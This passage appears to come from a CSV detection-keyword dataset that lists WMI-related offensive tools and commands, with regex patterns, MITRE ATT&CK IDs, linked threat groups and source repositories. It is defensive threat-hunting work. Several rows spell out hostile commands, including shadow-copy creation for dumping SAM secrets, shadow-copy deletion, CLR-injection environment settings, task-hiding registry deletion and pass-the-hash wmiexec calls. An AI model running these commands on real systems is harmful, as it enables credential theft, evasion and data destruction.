"*WMIBackdoor.ps1*",".{0,1000}WMIBackdoor\.ps1.{0,1000}","offensive_tool_keyword","RandomPS-Scripts","create or remove a backdoor using WMI event subscriptions","T1546.003 - T1059.001 - T1102","TA0005 - TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/xorrior/RandomPS-Scripts","1","1","N/A","N/A","10","4","318","86","2017-12-29T17:16:42Z","2015-02-25T04:52:01Z","62911" "*wmic /interactive:off nicconfig where TcpipNetbiosOptions=0 call SetTcpipNetbios 2*",".{0,1000}wmic\s\/interactive\:off\snicconfig\swhere\sTcpipNetbiosOptions\=0\scall\sSetTcpipNetbios\s2.{0,1000}","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","62913" "*wmic /namespace:\\root\default path stdRegProv call DeleteValue *SOFTWARE\YourSoftware\Schedule\TaskCache\Tree\*=*SD*",".{0,1000}wmic\s\/namespace\:\\\\root\\default\spath\sstdRegProv\scall\sDeleteValue\s.{0,1000}SOFTWARE\\YourSoftware\\Schedule\\TaskCache\\Tree\\.{0,1000}\=.{0,1000}SD.{0,1000}","offensive_tool_keyword","wmic","the threat actor deleted the SD value within the Tree registry path (hide scheduled task creation)","T1562","TA0005","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker - COZY BEAR","Defense Evasion","https://www.microsoft.com/en-us/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/","1","0","#registry","risk of False positive","9","10","N/A","N/A","N/A","N/A","62914" "*wmic ENVIRONMENT create name=""COR_ENABLE_PROFILING"",username=""%username%"",VariableValue=""1""*",".{0,1000}wmic\sENVIRONMENT\screate\sname\=\""COR_ENABLE_PROFILING\"",username\=\""\%username\%\"",VariableValue\=\""1\"".{0,1000}","offensive_tool_keyword","CLR-Injection","Use CLR to inject all the .NET apps","T1055.009","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/3gstudent/CLR-Injection","1","0","N/A","N/A","8","2","183","45","2021-04-17T01:39:32Z","2017-07-27T03:00:04Z","62921" "*wmic ENVIRONMENT create name=""COR_PROFILER"",username=""%username%"",VariableValue=""{11111111-1111-1111-1111-111111111111}""*",".{0,1000}wmic\sENVIRONMENT\screate\sname\=\""COR_PROFILER\"",username\=\""\%username\%\"",VariableValue\=\""\{11111111\-1111\-1111\-1111\-111111111111\}\"".{0,1000}","offensive_tool_keyword","CLR-Injection","Use CLR to inject all the .NET apps","T1055.009","TA0005 - 
TA0002","N/A","N/A","Defense Evasion","https://github.com/3gstudent/CLR-Injection","1","0","N/A","N/A","8","2","183","45","2021-04-17T01:39:32Z","2017-07-27T03:00:04Z","62922" "*wmic shadowcopy call create Volume='C:\'*",".{0,1000}wmic\sshadowcopy\scall\screate\sVolume\=\'C\:\\\'.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Dumping secrets from a Volume Shadow Copy We can also create a Volume Shadow Copy of the SAM and SYSTEM files (which are always locked on the current system) so we can still copy them over to our local system. An elevated prompt is required for this.","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","62949" "*wmic startup get Caption,Command,Location,User*",".{0,1000}wmic\sstartup\sget\sCaption,Command,Location,User.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1059.001 - T1078 - T1086 - T1021.002 - T1046","TA0008 - TA0003 - TA0004 - TA0005 - TA0006 - TA0009 - TA0010 - TA0011","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","62951" "*wmic.exe* Shadowcopy Delete*",".{0,1000}wmic\.exe.{0,1000}\sShadowcopy\sDelete.{0,1000}","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","N/A","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","FIN7","10","10","N/A","N/A","N/A","N/A","62960" "*wmic/wmic.cmd*",".{0,1000}wmic\/wmic\.cmd.{0,1000}","offensive_tool_keyword","koadic","Koadic. 
or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","62961" "*wmicexe-whitelisting-bypass-hacking.html*",".{0,1000}wmicexe\-whitelisting\-bypass\-hacking\.html.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","62962" "*WMIcmd.exe*",".{0,1000}WMIcmd.{0,1000}","offensive_tool_keyword","WMIcmd","This tool allows us to execute commands via WMI and get information not otherwise available via this channel.","T1059.001 - T1021 - T1210.001","TA0002 - TA0007 - TA0008","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker - COZY BEAR","Discovery","https://github.com/nccgroup/WMIcmd","1","1","N/A","N/A","N/A","4","332","77","2017-06-24T18:37:16Z","2017-05-17T06:50:12Z","62963" "*WMICStager*",".{0,1000}WMICStager.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","62964" "*wmi-event-lateral-movement.*",".{0,1000}wmi\-event\-lateral\-movement\..{0,1000}","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless Lateral Movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon 
Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","N/A","10","10","332","46","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z","62965" "*WMI-EventSub.cpp*",".{0,1000}WMI\-EventSub\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - 
Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","N/A","10","10","347","57","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z","62966" "*wmiexec *.exe*",".{0,1000}wmiexec\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","62967" "*wmiexec.exe -hashes *",".{0,1000}wmiexec\.exe\s\-hashes\s.{0,1000}","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","Dispossessor - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Exploitation tool","https://github.com/WKL-Sec/wmiexec","1","0","N/A","N/A","10","2","159","27","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z","62968" "*wmiexec.exe"" -hashes *",".{0,1000}wmiexec\.exe\""\s\-hashes\s.{0,1000}","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","Dispossessor - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Exploitation 
tool","https://github.com/WKL-Sec/wmiexec","1","0","N/A","N/A","10","2","159","27","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z","62969" "*WMIExec.git*",".{0,1000}WMIExec\.git.{0,1000}","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1021.005 - T1047 - T1059.001 - T1059.003 - T1059.005","TA0008 - TA0002 - TA0011","N/A","Dispossessor - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Exploitation tool","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","N/A","2","159","27","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z","62970" "*wmiexec.py -*",".{0,1000}wmiexec\.py\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","62971" "*WMIEXEC: Could not retrieve output file*",".{0,1000}WMIEXEC\:\sCould\snot\sretrieve\soutput\sfile.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#content","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","62972" "*wmiexec\wmiexec.go*",".{0,1000}wmiexec\\wmiexec\.go.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral 
Movement","https://github.com/C-Sto/goWMIExec","1","0","N/A","N/A","10","3","214","42","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z","62973" "*wmiexec_scheduledjob.py*",".{0,1000}wmiexec_scheduledjob\.py.{0,1000}","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1021.005 - T1047 - T1059.001 - T1059.003 - T1059.005","TA0008 - TA0002 - TA0011","N/A","Dispossessor - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Exploitation tool","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","N/A","2","159","27","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z","62974" "*wmiexec_win32process.py*",".{0,1000}wmiexec_win32process\.py.{0,1000}","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1021.005 - T1047 - T1059.001 - T1059.003 - T1059.005","TA0008 - TA0002 - TA0011","N/A","Dispossessor - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Exploitation tool","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","N/A","2","159","27","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z","62975" "*wmiexec2.0.py*",".{0,1000}wmiexec2\.0\.py.{0,1000}","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). 
This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1021.005 - T1047 - T1059.001 - T1059.003 - T1059.005","TA0008 - TA0002 - TA0011","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","N/A","9","1","34","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z","62976" "*wmiexec2.py*",".{0,1000}wmiexec2\.py.{0,1000}","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1021.005 - T1047 - T1059.001 - T1059.003 - T1059.005","TA0008 - TA0002 - TA0011","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","N/A","9","1","34","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z","62977" "*wmiexec2-main*",".{0,1000}wmiexec2\-main.{0,1000}","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1021.005 - T1047 - T1059.001 - T1059.003 - T1059.005","TA0008 - TA0002 - TA0011","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","N/A","9","1","34","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z","62978" "*WMIExecHash.*",".{0,1000}WMIExecHash\..{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. 
Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","62979" "*WMIExecHash.boo",".{0,1000}WMIExecHash\.boo","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","62980" "*WMIExec-main*",".{0,1000}WMIExec\-main.{0,1000}","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1021.005 - T1047 - T1059.001 - T1059.003 - T1059.005","TA0008 - TA0002 - TA0011","N/A","Dispossessor - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Exploitation tool","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","N/A","2","159","27","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z","62981" "*wmiexec-Pro.git*",".{0,1000}wmiexec\-Pro\.git.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral 
Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","62982" "*wmiexec-pro.py*",".{0,1000}wmiexec\-pro\.py.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","62983" "*wmiexec-Pro/tarball*",".{0,1000}wmiexec\-Pro\/tarball.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","62984" "*wmiexec-Pro/zipball*",".{0,1000}wmiexec\-Pro\/zipball.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","62985" "*WMIHACKER : Login -> 
OK*",".{0,1000}WMIHACKER\s\:\sLogin\s\-\>\sOK.{0,1000}","offensive_tool_keyword","WMIHACKER","Bypass anti-virus software lateral movement command execution test tool - No need 445 Port","T1047 - T1569.002 - T1218 - T1036.005","TA0008 - TA0002 - TA0005","N/A","N/A","Lateral Movement","https://github.com/rootclay/WMIHACKER","1","0","#content","N/A","9","10","1423","236","2025-01-20T15:37:28Z","2020-07-02T06:57:25Z","62986" "*WMIHACKER.vbs*",".{0,1000}WMIHACKER\.vbs.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","62987" "*wmi-lateral-movement.*",".{0,1000}wmi\-lateral\-movement\..{0,1000}","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless Lateral Movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","N/A","10","10","332","46","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z","62988" "*WMImplant*",".{0,1000}WMImplant.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. 
WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/FortyNorthSecurity/WMImplant","1","1","N/A","N/A","N/A","10","813","146","2024-06-25T12:02:26Z","2016-05-24T14:00:14Z","62989" "*WMIPersist.*",".{0,1000}WMIPersist\..{0,1000}","offensive_tool_keyword","WMIPersistence","An example of how to perform WMI Event Subscription persistence using C#","T1547.008 - T1084 - T1053 - T1059.003","TA0003 - TA0004 - TA0002","N/A","N/A","Persistence","https://github.com/mdsecactivebreach/WMIPersistence","1","1","N/A","N/A","N/A","2","113","30","2019-05-29T09:48:46Z","2019-05-29T09:40:01Z","62990" "*wmipersist.py*",".{0,1000}wmipersist\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
